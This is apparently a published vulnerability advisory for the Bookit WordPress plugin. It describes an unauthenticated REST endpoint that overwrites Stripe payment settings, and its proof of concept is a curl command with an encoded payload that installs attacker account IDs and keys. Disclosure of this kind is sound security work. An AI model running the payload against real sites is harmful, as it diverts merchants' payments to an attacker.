Bookit < 2.5.1 – Unauthenticated Settings Update | CVE 2025-12841 | Plugin Vulnerabilities

Description

The plugin has a publicly accessible REST endpoint that allows unauthenticated update of the plugins Stripe payment options.

Proof of Concept

Run:

```
curl -G 'http://example.com/wp-json/bookit/v1/commerce/stripe/return'   --data-urlencode 'stripe=eyJzdHJpcGVfdXNlcl9pZCI6ICJhY2N0X0hBQ0tFUiIsICJsaXZlIjogeyJhY2Nlc3NfdG9rZW4iOiAic2tfbGl2ZV9IQUNLRVIifSwgInNhbmRib3giOiB7ImFjY2Vzc190b2tlbiI6ICJza190ZXN0X0hBQ0tFUiJ9LCAiY2xpZW50X2lkIjogImNhX0hBQ0tFUiIsICJwdWJsaXNoYWJsZV9rZXkiOiAicGtkbGl2ZV9IQUNLRVIiLCAiY2xpZW50X3NlY3JldCI6ICJza19saXZlX0hBQ0tFUiJ9'
```

As an admin, go to: 

https://example.com/wp-admin/admin.php?page=bookit-settings&tc-stripe-error=tc-stripe-disconnect-error#payments

See that the connected Stripe user is `acct_HACKER`

Affects Plugins

Fixed in 2.5.1

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Submitter website

https://github.com/Nxploited

Verified

Yes

WPVDB ID

60cb3d5f-1aa5-4858-ab84-07fe7c023fdd

Timeline

Publicly Published

2025-11-15 (about 1 month ago)

Added

2025-11-08 (about 1 month ago)

Last Updated

2025-12-12 (about 20 days ago)

Other

Published

Title

Published

2025-04-09

Title

Eazy Plugin Manager <= 4.3.0 - Missing Authorization

Published

2025-09-22

Title

Clariti < 1.2.2 - Missing Authorization

Published

2025-05-16

Title

MapSVG < 8.6.13 - Missing Authorization

Published

2025-07-17

Title

Listly: Listicles For WordPress <= 2.7 - Unauthenticated Arbitrary Transient Deletion

Published

2025-01-16

Title

Team 118GROUP Agent <= 1.6.0 - Missing Authorization to Unauthenticated Arbitrary Content Deletion